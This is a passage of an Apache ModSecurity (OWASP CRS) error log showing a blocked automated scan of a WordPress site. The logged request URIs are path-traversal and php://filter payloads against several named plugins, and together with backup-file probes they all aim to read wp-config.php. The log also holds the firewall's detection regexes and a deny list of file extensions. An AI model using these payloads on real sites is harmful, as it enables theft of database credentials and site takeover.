"CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "YtscfipbG8_UBGXeM63w8wAAAJA"] [Fri Jul 22 16:54:06.719208 2022] [:error] [pid 22471:tid 140017083057920] [client 72.11.157.116:51904] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-ajax.php?action=getfile&/../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "YtscfuCtYZwatdwcM8Wq7wAAAEc"] [Fri Jul 22 16:54:19.066743 2022] [:error] [pid 22472:tid 140016965560064] [client 72.11.157.116:51970] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "YtsciypbG8_UBGXeM63w_gAAAJU"] [Fri Jul 22 16:54:19.162427 2022] [:error] [pid 22472:tid 140017041094400] [client 72.11.157.116:51972] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "YtsciypbG8_UBGXeM63w_wAAAIw"] [Fri Jul 22 16:54:21.901094 2022] [:error] [pid 23081:tid 140016982345472] [client 72.11.157.116:51982] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "YtscjXhurfgLch3PImzIVQAAANM"] [Fri Jul 22 16:54:40.791842 2022] [:error] [pid 23081:tid 140017041094400] [client 72.11.157.116:52052] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.bak"] [unique_id "YtscoHhurfgLch3PImzIYwAAAMw"] [Fri Jul 22 16:54:46.931300 2022] [:error] [pid 22472:tid 140017125021440] [client 72.11.157.116:52074] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/~wp-config.old"] [unique_id "YtscpipbG8_UBGXeM63xEgAAAII"] [Fri Jul 22 16:55:04.320919 2022] [:error] [pid 23081:tid 140017041094400] [client 72.11.157.116:52152] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.bak"] [unique_id "YtscuHhurfgLch3PImzIcQAAAMw"] [Fri Jul 22 16:55:11.002021 2022] [:error] [pid 23081:tid 140017108236032] [client 72.11.157.116:52178] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/_wp-config.old"] [unique_id "Ytscv3hurfgLch3PImzIdgAAAMQ"] [Fri Jul 22 16:55:53.541349 2022] [:error] [pid 22472:tid 140017091450624] [client 72.11.157.116:52362] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-license.php?file=..%2F..%2F%2Fwp-config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-license.php"] [unique_id "Ytsc6SpbG8_UBGXeM63xQAAAAIY"] [Fri Jul 22 16:56:01.339299 2022] [:error] [pid 22472:tid 140017125021440] [client 72.11.157.116:52388] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Ytsc8SpbG8_UBGXeM63xRQAAAII"] [Fri Jul 22 16:56:01.428900 2022] [:error] [pid 23081:tid 140017015916288] [client 72.11.157.116:52390] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Ytsc8XhurfgLch3PImzIngAAAM8"] [Fri Jul 22 16:56:49.621549 2022] [:error] [pid 22470:tid 140017083057920] [client 72.11.157.116:52564] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php%3A%2F%2Ffilter%2Fresource%3D..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "YtsdIXxqqtgWgIAXsGFhzwAAAAc"] [Fri Jul 22 16:56:49.711991 2022] [:error] [pid 23081:tid 140017007523584] [client 72.11.157.116:52566] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "YtsdIXhurfgLch3PImzIvgAAANA"] [Fri Jul 22 16:56:50.411204 2022] [:error] [pid 22472:tid 140017074665216] [client 72.11.157.116:52572] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpsite-background-takeover/exports/download.php"] [unique_id "YtsdIipbG8_UBGXeM63xYgAAAIg"] [Fri Jul 22 16:56:54.233613 2022] [:error] [pid 23081:tid 140017024308992] [client 72.11.157.116:52592] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/force-download.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/force-download.php"] [unique_id "YtsdJnhurfgLch3PImzIwgAAAM4"] [Fri Jul 22 16:56:54.896268 2022] [:error] [pid 22471:tid 140016982345472] [client 72.11.157.116:52598] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /mdocs-posts/?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/mdocs-posts/"] [unique_id "YtsdJuCtYZwatdwcM8WrFwAAAFM"] [Fri Jul 22 16:56:56.872414 2022] [:error] [pid 22472:tid 140017083057920] [client 72.11.157.116:52608] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "YtsdKCpbG8_UBGXeM63xaQAAAIc"] [Fri Jul 22 16:56:57.751190 2022] [:error] [pid 22472:tid 140017015916288] [client 72.11.157.116:52614] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "YtsdKSpbG8_UBGXeM63xagAAAI8"] [Fri Jul 22 16:56:57.841960 2022] [:error] [pid 22470:tid 140017057879808] [client 72.11.157.116:52616] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "YtsdKXxqqtgWgIAXsGFh0gAAAAo"] [Fri Jul 22 16:56:57.944168 2022] [:error] [pid 22471:tid 140017015916288] [client 72.11.157.116:52618] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /?mdocs-img-preview=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "YtsdKeCtYZwatdwcM8WrGAAAAE8"] [Fri Jul 22 16:56:58.872366 2022] [:error] [pid 22472:tid 140016957167360] [client 72.11.157.116:52622] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "YtsdKipbG8_UBGXeM63xawAAAJY"] [Fri Jul 22 16:56:59.021965 2022] [:error] [pid 22470:tid 140017141806848] [client 72.11.157.116:52624] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/themes/twentyeleven/download.php?filename=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/twentyeleven/download.php"] [unique_id "YtsdK3xqqtgWgIAXsGFh0wAAAAA"] [Fri Jul 22 16:56:59.113357 2022] [:error] [pid 23081:tid 140016990738176] [client 72.11.157.116:52626] [client 72.11.157.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match 